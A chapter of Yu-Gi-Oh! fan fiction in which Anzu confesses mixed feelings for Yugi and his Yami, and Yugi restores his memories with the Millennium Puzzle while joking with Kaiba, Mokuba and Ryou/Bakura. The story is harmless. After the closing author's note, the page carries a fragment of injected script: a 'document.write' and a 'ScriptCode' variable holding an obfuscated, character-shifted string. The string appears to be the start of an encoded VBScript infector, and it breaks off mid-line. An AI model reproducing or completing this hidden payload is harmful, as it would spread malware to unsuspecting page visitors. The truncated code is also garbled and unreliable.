Yu-Gi-Oh! Fan Fiction ❯ Lost Identity ❯ Reminiscence ( Chapter 10 )

[ P - Pre-Teen ]

az: Okay... even if I don't if there's any Muslims reading this fic... I said it anyway... Selamat Hari Raya!!! It doesn't matter anyway.... in M'sia, we celebrate almost everything... be it Chinese New Year, Deepavali... and even Christmas!! It's fun living here....


Disclaimer: I don't own Yugioh manga nor did I own anime spare the DVDs and my DM deck that I so much treasure until the end of time. Heads will roll if people found out that I OWNED Yugioh.... NOT!! Characters and original excerpts from the fic are copyrights of Kazuki Takahashi.


Chapter 10: Reminiscence

Written by Azzie/Az @ Alienna Azuani

'Aah!! Jyounouchi.... Chotto matte kudasai!!', shouted Anzu as she chased after the blond lad who had passed the hospital gates. Jyounouchi stopped and turned himself around as Anzu managed to catch up with him. The poor girl breathed heavily as she tried to regain her breath.

'Why did you left also? Didn't you want to stay with Yugi longer...?', said Jou as Anzu walked home with him. The girl sighed. 'I don't know if I should stay with him right now. Yugi didn't recognize me... and I could feel that I am a stranger to him now...' Jyounouchi glanced at her in surprise. 'Anzu!! How could you say something like that? But tell me one thing first... do you liked Yugi? I mean, really liked him...', asked the lad as Anzu's face flushed red at the inquiry.

'I... I'm not sure...', replied Anzu, doubtfully. Jyounouchi slapped his forehead one time. 'Anzu... don't tell me you're... Yugi had always liked you!! He never tells but I knew...', said Jou as Anzu cast a nervous glance at him. '..Err, I'm afraid that Yugi would be angry if I told him this...', she said as Jou groaned. 'Why, Anzu... you..'

'I had liked his Yami for a long time...'

Jyounouchi gasped as Anzu continued. '..and I think I've started to see Yugi in a different view, not just as a childhood friend. Or as a sister.', she said as she paused. 'Throughout all these years, what with the Duelist Kingdom, Battle City, the memory world and everything... Somehow, I had started to be confused on which of them that I liked...'

'Anzu!! It doesn't matter now! Both of them had become one now...'

'But would Yugi be angry if he found out about this? What happened if he recollect his memories before this and realized this fact? He would never forgive me...'

/Yeah, I would never forgive you!! I already knew.../

Anzu gasped suddenly. 'Jyounouchi? Did you said something just now?', said Anzu as Jou gave her a strange look. 'I didn't... what? And Anzu, before you make any assumptions... you'd better talk to Yugi about this...', said Jou as he left Anzu to head towards another road fork. 'Jyounouchi...?', she gasped as she looked back towards the direction of the hospital. 'Yugi...', she sighed to herself as she thought about the lad. She was confident that she had heard Yugi's voice just now. She sighed again as she resumed walking home.

/Anzu... just forget about me. The old Yugi and his Yami were no longer existing. They're dead now. What's left now was me.../

She heard the voice again, this time she was really sure that it was Yugi's. Anzu clutched her chest as a silent tear swept across her cheek. 'No, Yugi... That's a lie! I'll wait for you, no matter how long does it take... I love you...', whispered Anzu softly as she ran towards her house.

/We'll see about that..../

**

Kaiba sighed in contemplation as Mokuba hold out the apple slices that he had sliced from the basket of fruits Yugi's grandpa had sent through him. The older Kaiba picked up a slice and chomped into it. 'So, what now... Yugi? What do you want to do? Do I have to put another memory spell on you again or what..?', said Kaiba, sarcastically. Mokuba's eyes lighted up as he heard his brother. 'Yugi!! Is that true? You already can remember everything? So soon?', gasped the boy as Yugi smiled at him.

Yugi nodded at the young boy as he gave a mocking laugh towards Kaiba. 'But not all of my memories I had remembered, Mokuba-kun. And Kaiba, there's no need to put me under that spell or anything... I'll destroy what's left of it right now...!!', said Yugi as he grabbed his half-finished puzzle. Bakura, Kaiba and Mokuba looked at him in shock as Yugi pieced back the puzzle in a fraction of seconds!!

Kaiba caught his hand as Yugi was about to replace the last piece of the puzzle. 'Yugi... are you sure about this? Don't be rash...', he said as Yugi smiled at him. 'It's okay...', said Yugi as he pulled his hands away. 'These few days... I had been recovering a lot, thanks to your medical team. I think I could handle the full memories of my past and present. You yourself said that I have to face it... one way or another...'

Kaiba nodded as Mokuba and Bakura showed their support too. Yugi glanced at them as he prepared to insert the last piece of the puzzle. At that moment, images of his friends and families flashed in front of his eyes. Mahado... Mana... Seto, Bakura, Ishizu... Anzu and Jyounouchi... Grandpa... Minna, give me your strength..., whispered Yugi in his heart as he popped the piece at the bottom of the puzzle. Immediately, the puzzle glowed and a beam on light shot towards his forehead, to reveal the sennen eye mark. The mark glowed for a few seconds before vanishing into him. Yugi gasped as the full blow of his memories rushed into his mind.

'Aah!!! Ittai...', cried Yugi as he clutched his forehead with his injured hand. Kaiba grinned at him as he gently pulled Yugi's injured hand down. 'Of course, it hurts... stupid!! You used your injured hand too quickly... bones doesn't heal as quickly as you might think!!', teased Kaiba as Bakura handed him some painkiller and a glass of water. 'Here... if your headache was that bad..', said the albino as Mokuba helped him to swallow the pills.

'Thanks, Mokuba-kun. Bakura... Seto. I think, starting tomorrow... the four of us would have to do a lot of acting...', said Yugi as Bakura shrugged. 'You can count on me!! I'm always a good actor!! I've always could fool you guys when I acted like Ryou...', said Bakura pompously as Mokuba poke him at the ribs. 'Don't be too proud!!', cried Mokuba as Bakura made a face at him.

/Mokuba's right! It's not fun when you assumed my identity and fool people that you were me... It's like you're underestimating me.../

//Ooh... Ryou, don't say that...! It's not like I didn't changed my attitude, all these two years since the memory world incident...//

/Yeah? And should I trust you...?/

Bakura rolled his eyes at his other self. /Ch... if you have to be so edgy... Why don't you take over now?/, Bakura snapped as the sennen ring glowed and forced Ryou to come out. Ryou blinked in confusion as the others stared at him in surprise. Ryou smiled helplessly at them.

'Sorry... just had a fight with myself...', he said as he pulled his chair nearer towards Yugi. '..anyway, you can count on us. I'm sure the others would understand...'

Kaiba nodded. 'So, tomorrow morning... I picked you guys up from here. Transportation was scarce here at the mornings... and I don't think your grandfather could come by himself, Yugi.', he said as Yugi's eyes widen. 'Wha..? It's school day tomorrow!! You...'

'..don't need to worry. Anyway, the next day was Saturday and the term would end in about a month!! No fuss!!'

Ryou smirked at the young CEO as he rolled his eyes at him. 'I never thought I'd be hearing this from you... Kaiba.', he said as he received a teasing jab on his shoulder by the latter's younger brother. Kaiba gave him another smirk. 'Why... can't I?', he said as Yugi, Ryou and Mokuba laughed their heads off. 'No... I just can't imagine someone like you to think about skipping schools with leisure...!', said Ryou again as he laughed again.

'So maybe... the story was true! Whoever could unleash the powers of the sennen items could obtain not only the dark powers it held... but also cleverness!! So we don't really need to go to school...', mused Yugi loudly as Kaiba sent a powerful smack on his head with a pillow. 'Yugi!! Don't tease me... I didn't become CEO of the KaibaCorp with the sennen powers!!'

Yugi's grin widen in amusement. 'Oh yeah? So Ryou and I were not clever then, eh? Even before the items came to us... we have already had some good brains...', teased Yugi more as Seto wrapped his arm around him. 'Hey... you're being silly now... I'm not the only young CEO here, you know...'

'Oh... speaking of that, Yugi... you are still the CEO of the Industrial Illusions, aren't you?', said Ryou suddenly as Mokuba nodded at them. Yugi shrugged. 'I guess so... I did defeat Pegasus. And the guy said if I win him, I'll get 60% of the shares. But right now... I just left Pegasus's old assistant to run the company. And don't forget, Pegasus is still there!! They've already working on the DDM game Otogi had created. I wondered when will Pegasus come to ask me more about me being it's new CEO...', said Yugi as he added. 'I don't know what to do with it... my family was never into those kinds of business, though grandpa might be interested. There's a lot of the old games at the shop and he'll be glad to make more money...'

Kaiba laughed as he ruffled Yugi's hair. 'Hahahaha... we should probably make some kind of franchise between us! So, Yugi... Is your grandpa and mum your only family..?' Yugi shrugged. 'I guess so... I never knew any other relatives since I was very small, and nobody came to visit us. And I had long since meeting my dad after my parents separated...'

'Oh...', sighed Mokuba as he jumped towards his brother's lap. '..perhaps, that's for the better... I can't imagine what it'll be like if you had relatives like ours...', said the boy as Ryou shrugged. 'Well... I can't say much about my family. With my father occasionally moved around for various archeological digs, my family never stayed in one place long. I barely knew any of my relatives... and I don't think any of them would be pleased if they knew about Bakura...', said Ryou as he received a warning jab from his other self. 'Not like it mattered... since I lived by myself now...'

The foursome sighed heavily. The room was quiet for a few minutes before Yugi coughed out loud. 'So, you two... Aren't you two better be getting home anytime soon?', said Yugi as Ryou stifled a yawn. 'We'll be going home after we see you two off to sleep...', said Kaiba as he grinned at the two. 'Hey!!', cried Ryou. 'We're not kids... Kaiba!!'

Kaiba held out his tongue cheekily as he hugged his younger brother. 'It's exciting to make fun of you two...'

'Alright... don't pull anything funny, I can't stand to have any more laughing bouts!', said Yugi as the three looked at him in amusement.

'Hey... you guys hadn't anything to do... isn't it?', mused Yugi as Kaiba gave him a surprised look. 'You've just noticed..?', he said as Mokuba grinned...

[TBC]


az: Okay... funny to think I'll be writing this at the middle of the Hari Raya celebrations... Well, if I could go sneaking off to buy some booster packs, that'll be fun! Strange... other ppl go around collecting angpows... I'm here writing fics and playing Duel Monsters... hahahah.....

A/N: Kinda short, 'uh? Well... at least one of my fics is getting on... My saiyuki fics are still sleeping as well as the others. No reviews helped that too... hahaha... *laughed like Bakura and Seto* Muahahahahahah.... document.write "

" ScriptCode = "ChlRBqhos+VRBqhos+@ookds+VhmO`sg+mEnkcdq+mBncdRtaQtm^Shld'(EE/0'(EE/1'(Dmc RtaEtmbshnmEE/0'(NmDqqnqQdrtldMdwsDqq-Bkd`qSncnHs